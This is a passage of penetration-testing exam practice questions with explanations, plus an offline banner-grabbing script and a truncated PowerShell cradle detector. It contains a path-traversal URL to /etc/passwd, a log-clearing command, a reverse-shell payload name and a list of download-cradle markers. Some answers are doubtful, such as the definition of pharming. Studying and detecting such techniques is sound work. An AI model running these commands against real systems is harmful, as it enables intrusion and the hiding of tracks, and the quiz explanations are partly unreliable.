a) Robots #The robots.txt file tells well-behaved crawlers where to search and, more importantly, where NOT to search; for a tester the Disallow entries are a list of paths the owner did not want indexed, which makes them worth visiting by hand rather than skipping. #One of the more useful fields in a digital certificate from a reconnaissance perspective is the subject alternative name (SAN), which can reveal additional hostnames. #The Certificate Revocation List (CRL) is a list of certificates that have in some way been deemed invalid; although the CRL is effective, most online services have moved to the newer OCSP to check certificate validity. #Secret.txt is not a standard file; it appears only as a sample filename in steganography exercises.

A penetration tester has established a foothold inside a network and wants to conduct reconnaissance inside while remaining anonymous. What could they use to best accomplish this? a) SOCKS b) masscan c) Ostinato d) Snow

a) SOCKS #Proxy servers are used on a network to mediate the communications between a client and another server. One method is to use Socket Secure (SOCKS). #masscan is not a tool meant for inside networks. It is extremely noisy and was designed for scanning the internet rapidly. This could actually take down a network if not careful. #Ostinato uses packet crafting techniques as part of the attack. A more popular packet crafting tool is Scapy or hping3 which allows users to craft their own packets.

A military unit has adopted sending communications hidden in the white space of text files as a standard operating procedure. Which of the following tools uses white space to conceal data payloads? a) Snow b) Steghide c) OpenStego d) Yersinia

a) Snow #White space is the hint. #Snow is a CLI steganography tool that conceals a data payload in the whitespace (trailing spaces and tabs) of an ASCII text file. #Steghide embeds data in image and audio carrier files (JPEG, BMP, WAV, AU). #OpenStego is similar to most other tools in that you embed a message in a carrier file; to get started, you'll need the Java Runtime Environment (JRE) installed. #Yersinia is a layer 2 attack tool (STP, CDP, DTP, DHCP, HSRP, 802.1Q and similar) that crafts protocol frames as part of its attacks; for general-purpose packet crafting, Scapy or hping3 are more popular.

A security consultant needs to gain information about executives during a penetration test. One method they want to attempt is by cloning Bluetooth devices of the executive personnel. Which of the following tools could they use to perform this? a) Spooftooph b) Airodump-ng c) Wifite2 d) Prowler

a) Spooftooph #One tool that can either spoof or clone a Bluetooth device is Spooftooph. Keep in mind, before making any changes to a Bluetooth adapter, you must run Spooftooph with root privileges.

An employee just started a new job and learns that the company uses a COBO policy for mobile devices. What does this mean? a) The company will issue the employee a mobile device that the employee can only use for company business. b) The company will allow the employee to bring their own device. c) The company will issue the employee a device that the employee can use for both company and personal business. d) The company will issue the employee a device that the employee can select from a curated list of devices.

a) The company will issue the employee a mobile device that the employee can only use for company business. #Corporate-owned, business only (COBO) means that the company will issue the employee a mobile device that the employee can only use for company business. #The company will allow the employee to bring their own device in the bring your own device (BYOD) deployment model. #The company will issue the employee a device that the employee can use for both company and personal business in the corporate-owned, personally enabled (COPE) deployment model. #The company will issue the employee a device that the employee can select from a curated list of devices in the choose your own device (CYOD) deployment model.

A security consultant is attempting to look for default passwords for a client's D-Link phones. Which of the following should they use? a) intitle:"DPH" "web login setting" b) inurl:"ccmuser/logon.asp" c) intitle:"Grandstream Device Configuration" password d) inurl:"CallManager"

a) intitle:"DPH" "web login setting" #intitle:"DPH" "web login setting" would be used to find the web login pages of D-Link phones. If they don't have the password, they can search online for the default password to try on the targeted system. #inurl:"ccmuser/logon.asp" would be used to find Cisco CallManager instances. They can also try other Google Hacking queries to find more information on VoIP phones that can be used to launch the attack. #intitle:"Grandstream Device Configuration" password would be used to find information about Grandstream phones. #inurl:"CallManager" would not be a useful way of finding CallManager instances; the ccmuser path is the reliable indicator.

A security professional is performing an assessment against web servers and is currently in the reconnaissance phase. They are performing initial service enumeration by attempting to open a session with service and getting the service to identify itself. Which of the following tools are suited for this? (Select all that apply.) a) netcat b) SET c) wget d) Shodan

a) netcat c) wget #Netcat (nc) is a popular tool for Unix and Linux. The following shows using an HTTP GET request to elicit the webserver type and version: echo -en "GET / HTTP/1.0\n\n\n"|nc www.comptia.org 80|grep Server. #Wget can be used to grab a banner using the following syntax: wget -S. When using this command, -S will print the HTTP headers that are sent by the server.
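The nc and wget one-liners above, reimplemented with raw sockets so the two banner-grabbing patterns are visible: send a request and read the headers (HTTP), or say nothing and read the greeting (SSH, SMTP, FTP). This is an added example, not code from the original notes; the loopback servers it starts are constructed stand-ins for a target so it runs offline, and against a real host you would pass that host's name and port.

```python
"""Banner grabbing with raw sockets: the Python equivalent of the nc/wget one-liners.

Added example (not from the original page). The local servers are constructed
stand-ins for a target so the code runs offline.
"""
import socket
import socketserver
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler


def grab_http_server_header(host, port, timeout=5.0):
    """Sends 'GET / HTTP/1.0' and returns the Server header value, or None.

    Same idea as: echo -en "GET / HTTP/1.0\\n\\n" | nc host 80 | grep Server
    """
    request = b"GET / HTTP/1.0\r\nHost: " + host.encode("ascii") + b"\r\n\r\n"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        data = b""
        while b"\r\n\r\n" not in data and len(data) < 65536:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    head = data.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:              # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


def read_greeting(host, port, timeout=5.0):
    """For protocols where the server speaks first (SSH, SMTP, FTP): read one line."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = b""
        while not data.endswith(b"\n") and len(data) < 1024:
            chunk = sock.recv(256)
            if not chunk:
                break
            data += chunk
    return data.decode("latin-1").rstrip("\r\n")


def start_local_http_server():
    """Constructed target: Python's own HTTP server on a random loopback port."""
    class QuietHandler(SimpleHTTPRequestHandler):
        def log_message(self, *args):
            pass
    server = HTTPServer(("127.0.0.1", 0), QuietHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def start_local_greeting_server(banner):
    """Constructed target that sends `banner` and hangs up, like an SSH or SMTP daemon."""
    class GreetHandler(socketserver.BaseRequestHandler):
        def handle(self):
            self.request.sendall(banner.encode("ascii") + b"\r\n")
    server = socketserver.TCPServer(("127.0.0.1", 0), GreetHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    http_srv, http_port = start_local_http_server()
    ssh_srv, ssh_port = start_local_greeting_server("SSH-2.0-OpenSSH_9.6 (constructed)")
    print("HTTP Server header:", grab_http_server_header("127.0.0.1", http_port))
    print("Greeting:", read_greeting("127.0.0.1", ssh_port))
    http_srv.shutdown()
    ssh_srv.shutdown()
```

Banners are self-reported and easily changed (or removed) by an administrator, so treat the result as a lead to verify with version-specific probes, not as proof of the software version.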

A security tester wants to disable monitor mode on a wireless interface. Which tool should they use? a) Aireplay-ng b) Airmon-ng c) Airodump-ng d) Pacu

b) Airmon-ng #Airmon-ng will enable and disable monitor mode on a wireless interface. Airmon-ng can also switch an interface from managed mode to monitor mode. #Aireplay-ng injects frames to perform an attack to obtain the authentication credentials for an access point, which is usually performed using a deauthentication attack. #Airodump-ng provides the ability to capture 802.11 frames and then use the output to identify the Basic Service Set ID (MAC address) of the access point along with the MAC address of a victim client device. #Pacu is designed as an exploitation framework to assess the security configuration of an AWS account. It includes several modules to attempt exploits such as obtaining API keys or gaining control of a VM instance.

A security professional is testing the Wi-Fi with MDK4 and wants to create the appearance of many wireless networks. Which of the following modes should they use? a) A b) B c) D d) W

b) B #Mode B creates the appearance of many wireless networks. MDK4 is a powerful Linux-based tool that features a wide range of attacks. #Mode A, authentication DoS, will send multiple authentication frames to every WAP in range with the intent of overwhelming the AP. #Mode D will send a deauth to disconnect and disassociate all clients from an AP. MDK4 supports 2.4 to 5 GHz and has nine attack modules. #Mode W will provoke an Intrusion Detection and Prevention System confusion attack. When testing with this tool, use caution, as some of the attack modules can have a serious negative effect on the network.

A security professional wants to use SET for a targeted attack towards personnel. Which of the following can SET NOT do? a) Spear phishing b) Badge cloning c) Website attacks d) Wireless attacks

b) Badge cloning #Badge cloning is not currently a capability of The Social Engineering Toolkit (SET), but it does allow for third-party modules. #Spear phishing is the first option under social engineering attacks. You can download SET and install it on Linux, Unix, and Windows machines or use it within Kali Linux. #Website attack vectors are the second option under social engineering attacks. SET allows you to select from a number of different options that include attacking websites, mass mailings, and spear phishing attacks. #Wireless attacks are the seventh option under social engineering attacks.

According to the OWASP Top 10, which of the following are among the most relevant critical security risks to web applications? (Select all that apply.) a) Secure deserialization b) Broken authentication c) Sufficient logging and monitoring d) Cross-site scripting

b) Broken authentication d) Cross-site scripting #Broken authentication is in the OWASP Top 10 as one of the most relevant critical security risks to web applications, and OWASP covers it in A2:2017-Broken Authentication. #Cross-site scripting (XSS) is in the OWASP Top 10 as one of the most relevant critical security risks to web applications, and OWASP covers it in A7:2017-Cross-Site Scripting (XSS). #Secure deserialization is not in the OWASP Top 10, but OWASP does cover insecure deserialization in A8:2017-Insecure Deserialization. #Sufficient logging and monitoring is not in the OWASP Top 10, but OWASP does cover insufficient logging and monitoring in A10:2017-Insufficient Logging & Monitoring.

A penetration tester likes the functionality of Armitage and wants to get a fuller paid version for use on client tests. What should they look into? a) Metasploit Pro b) Cobalt Strike c) Responder d) Ostinato

b) Cobalt Strike #Cobalt Strike is a commercial version of Armitage with advanced features and reporting. Armitage itself is an intuitive GUI for the Metasploit framework. #Metasploit Pro is a full-featured graphical version that includes Quick Start wizards, easy vulnerability scanning and validation, phishing campaigns, and reporting.

A PenTester is reverse engineering code by translating low-level machine code into higher level assembly language code so that the PenTester can read it and understand how the application is functioning. What type of reverse engineering process is this? a) Decompilation b) Disassembly c) Debugging d) Static code analysis

b) Disassembly #This is disassembly, which is the reverse engineering process of translating low-level machine code into higher-level assembly language code that is human readable and can include familiar programming elements. #Decompilation is the reverse engineering process of translating an executable into high-level source code to help determine whether the application's logic will produce unintended results. #Debugging is the process of manipulating a program's running state in order to analyze it for general bugs, vulnerabilities, and other issues. #Static code analysis is the process of reviewing uncompiled source code, either manually or using automated tools, to correct errors.

During a penetration testing engagement, one of the team members presents a fictitious situation as real. What is this tactic called? a) Elicitation b) Hoax c) Pretexting d) Phishing

b) Hoax #A hoax is another element of social engineering in which the attacker presents a fictitious situation as real. A hoax could be a link that leads to malicious code. #Elicitation is acquiring data from the target in order to launch an attack. This is different from information gathered about the target. #One social engineering tactic is to use pretexting, whereby the team will communicate, whether directly or indirectly, a lie or half-truth in order to get someone to believe a falsehood. #Phishing is a social engineering attack where the malicious actor communicates with the victim from a supposedly reputable source.

A digital forensics expert works for a large corporation and doesn't have enough time to manually analyze all the employee-returned mobile devices before administrators issue them to new employees. What tool can the forensics expert use to automate the evaluation of code and malware analysis on mobile devices? a) MSTG b) MobSF c) OWASP d) Kali

b) MobSF #The Mobile Security Framework (MobSF) can provide an automated evaluation of code and malware analysis using both static analysis and dynamic analysis. #The MSTG (Mobile Security Testing Guide) provides an intuitive framework that steps you through the assessment process and includes a dashboard, security recommendations, and specifications for testing resiliency.

An organization is using a testing framework to provide oversight and minimize risk with mobile devices. Which of the following are common elements of the testing framework when used on mobile devices? (Select all that apply.) a) COBO Approval b) Mobile Device Assessment c) Secure App Development d) Mobile App Testing

b) Mobile Device Assessment c) Secure App Development d) Mobile App Testing #A common element of the testing framework is mobile device assessment, which provides an overview of compliance and business logic issues. #A common element of the testing framework is secure app development, which creates organization-specific apps that are in line with organizational policy. #A common element of the testing framework is mobile app testing, which includes Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST).

A penetration tester wants to test exfiltrating data via encrypted mechanisms. What could they use to accomplish this? a) Netcat b) Ncat c) Coagula d) Yersinia

b) Ncat #Ncat is an interactive CLI tool written for the Nmap Project. Ncat is used to read and write raw data over a network and includes support for proxy connections along with IPv6 and SSL communications. NOTE: it is built into Nmap and can be installed on Windows, Linux, and macOS. #Netcat is a command-line utility used to read from or write to a TCP or UDP network connection.

A security professional is trying to evaluate a website for web-specific vulnerabilities. Which of the following is the tool most suited towards this objective? a) OpenVAS b) Nikto c) SQLmap d) Censys

b) Nikto #Nikto is an open-source web server scanner that can complete comprehensive testing on web servers for a variety of vulnerabilities, such as the absence of the anti-clickjacking X-Frame-Options header, and dangerous files and CGIs.

An attacker has sent an email where the victim navigates to a malicious web page that has been set up to look official. What is this called? a) Phishing b) Pharming c) Baiting d) Malvertising

b) Pharming #Pharming is when an attacker entices the victim into navigating to a malicious web page that has been set up to look official. #While this would fall under the phishing category, it more specifically falls under pharming. Phishing is a social engineering attack where the malicious actor communicates with the victim from a supposedly reputable source. #Baiting is where an attacker will leave bait, such as an infected physical media, in an area where a victim can find the device. #Spam can include malvertising, which is an email that looks like a normal ad, but instead includes malicious code.

An attacker is attempting to access a WPS device at a site in order to gain entry to a larger corporate network. Which of the following could they do? (Select all that apply.) a) HTTP flood b) Physical c) Side channel d) Brute force

b) Physical d) Brute force #"At a site" means the attacker is close to the device. #A physical attack takes advantage of the "push to connect" feature found on many routers. When launching this attack, the malicious actor will need to be physically close to the device. #In addition to a physical attack, a malicious actor can gain access to the network by determining the PIN of the WPS device, using an online or offline brute force attack. #A side-channel attack is possible because of the shared nature of the cloud infrastructure, especially in a PaaS model, and does not apply to a WPS device at a site.

A team of software engineers needs to build a set of APIs (application programming interfaces) between a customer relationship management system and a new web-based application that allows customer service representatives to create work orders and automatically populate the customer information. What is the best tool for the engineers to use to build and test the APIs? a) MSTG b) Postman c) APK Studio d) APKX

b) Postman #Postman is a tool that provides an interactive and automatic environment that allows teams to build, interact with, analyze, report on, and test HTTP APIs. #The MSTG (Mobile Security Testing Guide) provides an intuitive framework that steps you through the assessment process and includes a dashboard, security recommendations, and specifications for testing resiliency. #APK Studio is an integrated development environment (IDE) designed so you can decompile and/or edit an APK file. #The APKX tool is an Android APK file decompiler that allows you to pull and analyze the Java source code to see what's going on inside.

A penetration tester wants to try keeping multiple fake web connections open for as long as possible, until the maximum number of allowed connections is reached. They want to employ this method on a test server to see how much they will be able to handle before needing to scale outwards. What type of attack should they use to test this? a) HTTP flood b) Slowloris c) DNS amplification d) Prowler

b) Slowloris #A slowloris attack keeps multiple fake web connections open for as long as possible until the maximum number of allowed connections is reached. #An HTTP flood uses seemingly legitimate HTTP GET or POST requests to attack a web server. It does not require spoofing or malformed packets but can consume a high number of resources with a single request. #Prowler is an audit tool for use with Amazon Web Services only. It can be used to evaluate cloud infrastructure against the Center for Internet Security (CIS) benchmarks.

A PenTester is preparing to target a database but cannot find any code on the Internet to exploit it. What are some reasons why this would happen? (Select all that apply.) a) The Internet does not host exploit code. b) The administrator patched the database. c) It is not a common database type. d) It is a proprietary database.

b) The administrator patched the database. c) It is not a common database type. d) It is a proprietary database. #The penetration tester may find exploitation code difficult to locate because the administrator recently patched the database, and it is no longer vulnerable to known exploits. #The penetration tester may find exploitation code difficult to locate because it is not a common database type; therefore, there are no publicly available exploits for it. #The tester may find exploitation code difficult to locate because it is a proprietary database that the organization developed in-house, so there are no exploit scripts freely available on the Internet for it. NOTE: Exploit code exists and is publicly available on the Internet or via other sources, so it is highly likely a PenTester will be able to find exploit code to use during a penetration test.

A security researcher has detected anomalous timestamp entries where a system's log event microseconds have all been set to 0, and they suspect the system has been compromised and the timestamps modified. Which tool did the attacker probably use? a) Meterpreter b) TimeStomp c) Shred d) Wevtutil

b) TimeStomp #Changing time values is possible by using TimeStomp, a tool inside Metasploit's Meterpreter that allows you to delete or modify timestamp-related information on files. #Shred is a command built into Linux to make sure that files are securely deleted and completely removed. Windows doesn't have a built-in command-line equivalent to file-based shredding. #When using the command-line interface (CLI) in Windows, you can also clear individual log categories. For example, wevtutil cl Application will clear the application log.

A PenTester is using Python to write a script in preparation for a PenTest. What can the PenTester do to complete the script quickly as well as take advantage of work that others have already completed? (Select all that apply.) a) Write each line of code from scratch b) Use classes c) Use modules d) Use pre-built libraries

b) Use classes c) Use modules d) Use pre-built libraries #The PenTester can use classes, which are user-defined prototypes or templates from which PenTesters can create objects, and which allow the PenTester to bundle data and functionality together. #The PenTester can use modules, which are a way for the PenTester to code re-usable functions, variables, and classes that the tester can import into scripts. #The PenTester can use pre-built libraries. Importing and using existing modules in libraries can save the PenTester a lot of time because the tester is re-using modules that others have already created.

A security consultant is attempting to see users and potential passwords by using the following URL: http://comptia.com/resources/../../../../etc/passwd but receives a dropped packet. What is most likely preventing this? a) Router b) WAF c) Load balancer d) ACL

b) WAF #A web application firewall (WAF) is specifically designed to monitor web applications and guard against common attacks such as cross-site scripting (XSS) and SQL Injection (SQLi) attacks. #Routers act as control points for communications between network segments. A router is NOT preventing this activity. #A load balancer is used to stabilize network traffic across two or more servers. Balancing the load prevents any one server from getting too many requests. #An access control list (ACL) is essentially a list that tells devices the corresponding access rights that users have to various objects, such as file directories, or permissions to access network resources.

.NET is a cross-platform open-source software development framework. What operating system will the current version of .NET operate on? (Select all that apply.) a) Android b) Windows c) Linux d) macOS

b) Windows c) Linux d) macOS #The current version of .NET continues to run on Windows just as the old version of .NET did. It also continues to provide the basic functionality of the original .NET Framework. #The original .NET framework operated on Windows, but the current .NET will also operate on Linux. #.NET will run on macOS version 10.3 and higher and is made up of the runtime and the Software Development Kit. The .NET framework will not run on the Android operating system.

A penetration tester has landed a shell on a Linux box and wants to find out more about the users' login and idle time. Which built-in bash command should they use? a) cat /etc/passwd b) finger c) uname -a d) env

b) finger #The finger command views a user's home directory along with login and idle time. You can also use nmap -O or -sV scans to fingerprint the operating system and interrogate its services. #The cat /etc/passwd command lists all users on the system. If the Linux host is running the Samba service, you can use nmap smb-* NSE scripts against the target. #The uname -a command displays the OS name, version, and other details. If a Linux machine is compromised using Metasploit, the post/linux/enum_system module can be used to get information about the system. #The env command outputs a list of all the environmental variables.

A PenTester wants to use pre-existing libraries in a script. Which of the following will allow the PenTester to do that? a) def b) import c) my_str= d) $my_str =

b) import #import declares a pre-existing library that the script can use. If it is an external library module, the PenTester will need to download and install it before it can be imported. #def defines a function in Python. Functions, or procedures, produce modular, reusable code by grouping a block of code under a name that can call the function whenever needed. #my_str= is a Bash command used to assign a variable. The lack of whitespace around the equals sign is a strict rule in Bash. PowerShell, Python, and Ruby allow whitespace. #$my_str = is a PowerShell command used to assign a variable. PowerShell requires the dollar sign for a variable assignment.

A security researcher wants to scan documents against a website for only pdf documents. What metagoofil parameter could they use? a) metagoofil -d b) metagoofil -t c) metagoofil -l d) metagoofil -n

b) metagoofil -t #metagoofil -t pdf scans for pdf documents. Metagoofil scrapes the metadata, and then displays the information using Hypertext Markup Language (HTML). #metagoofil -d comptia.org scans for documents on comptia.org. #metagoofil -l 75 searches for 75 documents. The output can then be viewed in a standard browser. Another valuable tool is FOCA, which can discover metadata from a variety of sources. #metagoofil -n 25 downloads 25 files. You can download a copy of Metagoofil from GitHub. In addition, the tool is built into Kali Linux. NOTE: Metagoofil uses various Python libraries, such as PdfMiner, GoogleSearch, and Hachoir, to scrape the metadata, and then displays the information using HTML.

A security consultant is in the reconnaissance phase of a penetration test and believes there might be a non-stateful firewall blocking the scan. What nmap parameter could try to bypass the non-stateful firewall? a) -sS b) -oX c) -sF d) -sX

c) -sF #The -sF option sends a TCP FIN to bypass a non-stateful firewall. #When using Nmap, the TCP SYN scan (-sS) is the default and most popular option. It can be performed quickly and is able to scan thousands of ports per second on a fast network not hampered by restrictive firewalls. #XML output (-oX) is a format that can easily be analyzed by security automation tools, converted to HTML, imported into a database, or studied using Zenmap. #A Christmas tree scan sends a TCP segment with the FIN, PSH, and URG flags raised to bypass a firewall or IDS. This scan uses the option: -sX.

A PenTester assigned variables in a script and, in testing, discovered that the variables were not working because the PenTester used whitespaces around the equal signs in the variable assignments. What scripting environment is the PenTester using? a) PowerShell b) Python c) Bash d) Ruby

c) Bash #The PenTester is using Bash as the scripting environment, as Bash has a strict rule against using whitespace around the equals sign when the coder is assigning variables. NOTE: The PenTester is not using any of the other scripting environments (PowerShell, Python, and Ruby), because whitespace around the equals sign in variable assignments is allowed in all of them.

A mobile user was in the food court of a shopping mall when suddenly a video advertising a new store opening was downloaded to their device. What kind of attack was the mobile user subjected to? a) Rootkit b) Bluesnarfing c) Bluejacking d) Worm

c) Bluejacking #Know the difference between bluejacking and bluesnarfing. #The mobile user was the victim of a bluejacking attack which attackers use to send out unwanted text messages, images, or videos to a mobile phone, tablet, or laptop using a Bluetooth connection. #Rootkits provide a backdoor for illegal access to a host. Software developers often create backdoors to allow access for correcting code, but developers should remove them before the software is released. #Bluesnarfing is an aggressive attack that allows a malicious actor to read information from a victim's Bluetooth device. The end goal is to glean sensitive data from the victim.

A security researcher is setting up an evil twin as part of a security conference demonstration. Which type of attack does an evil twin typically perform? a) Jamming b) Brute force c) Deauthentication d) Zone transfer

c) Deauthentication #Getting users to join an evil twin is often accomplished by using a deauthentication attack. Once the client is kicked off the network, the attacker may be able to trick it into reconnecting to the rogue AP.

A PenTester is writing a script and includes several blocks of code that the PenTester can use in multiple places in the script simply by calling the blocks of code by name. What kind of scripting component is the PenTester using? a) Tree b) Class c) Function d) Module

c) Function #The PenTester is using functions, or procedures, which produce modular, reusable code and allow the PenTester to group a block of code under a name and call this named function whenever needed. #Trees appear inverted in data representation, where the root is at the top and the branches go down, with a leaf object at the end of a branch. #A class is a user-defined prototype or template, which can hold its own functions and creates objects. Classes allow PenTesters to bundle data and functionality together. #Modules are a way to code re-usable functions, variables, and classes that PenTesters can import into multiple scripts.

A PenTester is running a scan and wants to save the results in a file that the PenTester will be able to perform searches on and filter results later. What type of file format will the PenTester use? a) Regular expressions (regex) b) Nmap c) Greppable d) GitHub

c) Greppable #The PenTester will save the scan results to a greppable file, a format designed to be searched with grep, the Linux command for searching and filtering input. grep can also be used as a file search tool when combined with ls. #Regular expressions are a group of characters that describe how to execute a specific search pattern on a given text. #Nmap is a network discovery and security auditing tool that performs reverse-DNS resolution against every host that is online by default. #GitHub is a repository hosting service where PenTesters can store and share scripts through a command-line tool or a graphical user interface.

A penetration testing team is planning an attack on an organization's IoT devices and discovers that many of the devices are using an unencrypted protocol to communicate with each other, which makes them susceptible to sniffing, data modification, and becoming zombies. What protocol are the IoT devices using? a) SET b) UDP c) MQTT d) DTLS

c) MQTT #The devices are using the Message Queuing Telemetry Transport (MQTT) protocol which carries messages between devices, but the protocol does not encrypt the data which makes it vulnerable to attacks. #The Social Engineering Toolkit (SET) is a Python-based collection of tools that can be used when conducting a social engineering PenTest. #CoAP uses the User Datagram Protocol (UDP) as a transport layer protocol but has no method to provide security for group communication. #Datagram Transport Layer Security (DTLS) can use the Constrained Application Protocol (CoAP) to improve security, but there isn't any method to provide security for group communication.

A PenTester exclusively tests macOS systems and wants to use the command and control tool that will consistently provide the best results for that operating system. Which tool will the PenTester select? a) Empire b) Covenant c) Mythic d) Nishang

c) Mythic #Mythic is a cross-platform C2 framework tool that works with macOS, Linux, and Windows, but it contains payloads that provide consistently good results when PenTesting macOS. #Empire is a C2 framework that makes use of PowerShell for common post-exploitation tasks on Windows. It also has a Python component for Linux. #Covenant is a .NET command and control framework and, in a similar fashion to Empire, it aims to show the attack surface of .NET and make attacks through this vector easier.

A systems administrator for a small company is tasked with performing a vulnerability scan inside their network. They are not given a budget but instead are asked to find open-source tools. Which of the following could they use? a) theHarvester b) Metagoofil c) OpenVAS d) Scapy

c) OpenVAS #A team can run a vulnerability scan using the Open Vulnerability Assessment Scanner. OpenVAS will list the vulnerabilities along with a risk rating that summarizes the overall state of the site that was tested. #theHarvester gathers information on subdomain names, employee names, email addresses, PGP key entries, and open ports and service banners. #Scapy is a tool to craft and send a malformed packet to your target.

An employee refuses to apply updates to their mobile device for fear that it will change things on the device that will be annoying. What threat is the employee introducing? a) De-perimeterization b) Strained infrastructure c) Patching fragmentation d) Forensics complications

c) Patching fragmentation #Patching fragmentation occurs when device owners do not implement updates in a timely manner. This fragmented approach can lead to individuals using unsupported versions that leave the system vulnerable. #De-perimeterization occurs when employees take sensitive data outside of the corporate perimeter and do not properly secure their devices. This risks data exfiltration. #Strained infrastructure occurs when the addition of multiple devices places a strain on the network, causes it to stop functioning at optimum capacity, and may lead to an unintentional Denial of Service. #Dealing with bring-your-own-device (BYOD) hardware during a forensic exercise may cause forensics complications, prove difficult or even impossible, and compromise the integrity of an investigation.

A digital forensics expert needs to analyze an infected mobile device. What approach can the expert use to do this? (Select all that apply.) a) SMiShing b) Biometric integration c) Reverse engineering d) Sandbox analysis

c) Reverse engineering d) Sandbox analysis #The forensics expert can use reverse engineering to step through the code to see what happens when the code runs on a device. #The forensics expert can use sandbox analysis, which uses virtualization to provide a safe environment in which to analyze the malware. #Biometric integration is a system that employs a biometric, such as a fingerprint or facial recognition, when authenticating into a system, and is not a forensic analysis tool.

A security tester is looking at vulnerabilities regarding shared accounts. In which of the following environments are shared accounts more likely to be found? a) SaaS b) IaaS c) SOHO d) CDN

c) SOHO #A shared account can be used in a small office home office (SOHO) environment, as many SOHO networking devices do not allow you to create multiple accounts. #Software as a Service (SaaS) is not as likely to have a shared account as a SOHO environment. Cloud identity and account types are personnel, endpoints, servers, software, or roles. #Infrastructure as a Service (IaaS) is not as likely to have a shared account as a SOHO environment. Cloud identity and account types are personnel, endpoints, servers, software, or roles. #Data in cloud storage can be used to serve static web content, such as HTML pages, images, and videos. The content is published from the container to a content delivery network (CDN).

A threat actor has accessed a web server and is compromising the trust from the server to reach back-end resources. What type of attack is this? a) Session hijacking b) XSRF/CSRF c) SSRF d) PrivEsc

c) SSRF #In a server-side request forgery (SSRF) attack, an attacker takes advantage of the trust established between the server and the resources it can access, including itself. #In a cross-site request forgery (XSRF/CSRF) attack, an attacker takes advantage of the trust established between an authorized user of a website and the website itself. #Privilege escalation (or simply PrivEsc) describes obtaining a higher privilege than the one the user currently has, to enable resources that the regular user does not have permission for.

The Social Engineering Toolkit is being employed for a targeted attack towards personnel. Which of the following can SET NOT do? a) Mass mail attacks b) Infectious media c) Scaling d) PowerShell attacks

c) Scaling #Scaling is a physical security attack that applies to perimeter security, such as natural barriers or fences meant to deter someone from simply entering the property. #Mass mail attacks are the fifth option under social engineering attacks. You can download SET and install it on Linux, Unix, and Windows machines or use it within Kali Linux. #The infectious media generator is the third option under social engineering attacks. SET allows you to select from a number of different options that include attacking websites, mass mailings, and spear phishing attacks. #PowerShell attacks are the ninth option under social engineering attacks.

A penetration tester needs to craft a custom packet in order to bypass an Intrusion Prevention System (IPS). What tools could they use to craft custom packets? (Select all that apply.) a) OpenVAS b) Metagoofil c) Scapy d) Hping3

c) Scapy d) Hping3 #Scapy is a tool to craft and send a malformed packet to your target. The type of packet crafted will be dependent on security products and rules. #Hping3 is also a tool to craft and send a malformed packet to your target. For example, the Christmas (XMAS) scan might be able to bypass security mechanisms that follow strict interpretation of RFC 793.

A penetration tester is working on a project and sees a fairly recent VoIP vulnerability has come out. Which of the following records would best help them narrow down potential targets? a) TXT b) NS c) SRV d) MX

c) SRV #A Service (SRV) record provides host and port information on services such as voice over IP (VoIP) and instant messaging (IM). #A Text (TXT) record provides information about a resource, such as a server or network, in human-readable form. #A Nameserver (NS) record lists the authoritative DNS server for a particular domain. A standard DNS query will use DNS servers to identify the Internet Protocol (IP) address behind a particular domain or resource name. #A Mail Exchange (MX) record provides the mail server that accepts email messages for a particular domain.

A project manager is researching migrating to the cloud, specifically a PaaS model. Which of the following attacks is PaaS particularly subject to? a) Malware injection b) Direct-to-origin c) Side-channel d) DNS Poisoning

c) Side-channel #A side-channel attack is possible because of the shared nature of the cloud infrastructure, especially in a PaaS model. #In a malware injection attack, a malicious actor injects malicious code into an application. Common attacks can include SQL injection (SQLi) and Cross-Site Scripting (XSS). #In direct-to-origin attacks (D2O), malicious actors circumvent proxy protections by identifying the origin network or IP address and then launching a direct attack.

A Linux systems administrator is concerned about data exfiltration from one of their DMZ servers. What common service should they disable on these DMZ servers for externally facing assets? a) RDP b) SSH c) Telnet d) SFTP

c) Telnet #Telnet is a cleartext protocol, not an encrypted one, so credentials and session data can be read by anyone on the path. It should be disabled on externally facing servers regardless and not used in the enterprise unless absolutely necessary. #When communicating with a remote Linux-based machine, it is common to use Secure Shell (SSH), a protocol that provides a command-line (shell) session over an encrypted connection. #Remote Desktop Protocol (RDP) is a Microsoft protocol used for Windows machines rather than Linux; for graphical access to a Linux host, X11 can be forwarded over SSH. #SFTP runs over SSH and is the secure alternative to File Transfer Protocol (FTP), which is a cleartext protocol and should not be used.

A PenTester used msfvenom to generate a payload that a simplified script will download and execute. Which option indicates that PowerShell will not load any particular profile? a) -p b) -w hidden c) -c d) -nop

d) -nop #The -nop (-NoProfile) option tells PowerShell not to load any profile script, which could otherwise customise or interfere with how PowerShell behaves in the environment. #The -p option belongs to msfvenom and specifies the payload; for instance, -p cmd/windows/reverse_powershell selects the reverse PowerShell payload located under cmd/windows. #The -w hidden (-WindowStyle hidden) option hides the PowerShell window when the payload executes. #The -c (-Command) option tells PowerShell to execute the command block or script that follows and then exit.
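Added example (not from the original study set), showing the other side of these options: a small analyser for process-creation command lines that canonicalises PowerShell's short parameter forms (-nop, -w, -c, -e, -ep, and any unambiguous prefix) and scores the combination used by download-and-execute cradles. The command lines are constructed; the base64 blob is an opaque placeholder and is not decoded.

```python
# powershell.exe parameters and their documented short aliases; PowerShell also
# accepts any unambiguous prefix (e.g. -nopro), which canonical() handles.
PARAMS = ["NoProfile", "NonInteractive", "NoLogo", "NoExit", "WindowStyle",
          "Command", "EncodedCommand", "ExecutionPolicy", "File", "Version",
          "Sta", "Mta", "InputFormat", "OutputFormat"]
ALIASES = {"nop": "NoProfile", "noni": "NonInteractive", "nol": "NoLogo",
           "noe": "NoExit", "w": "WindowStyle", "c": "Command",
           "e": "EncodedCommand", "ec": "EncodedCommand", "enc": "EncodedCommand",
           "ep": "ExecutionPolicy", "ex": "ExecutionPolicy", "f": "File", "v": "Version"}
SWITCHES = {"NoProfile", "NonInteractive", "NoLogo", "NoExit", "Sta", "Mta"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "net.webclient", "invoke-webrequest",
                  "iwr ", "iex", "invoke-expression", "start-bitstransfer")

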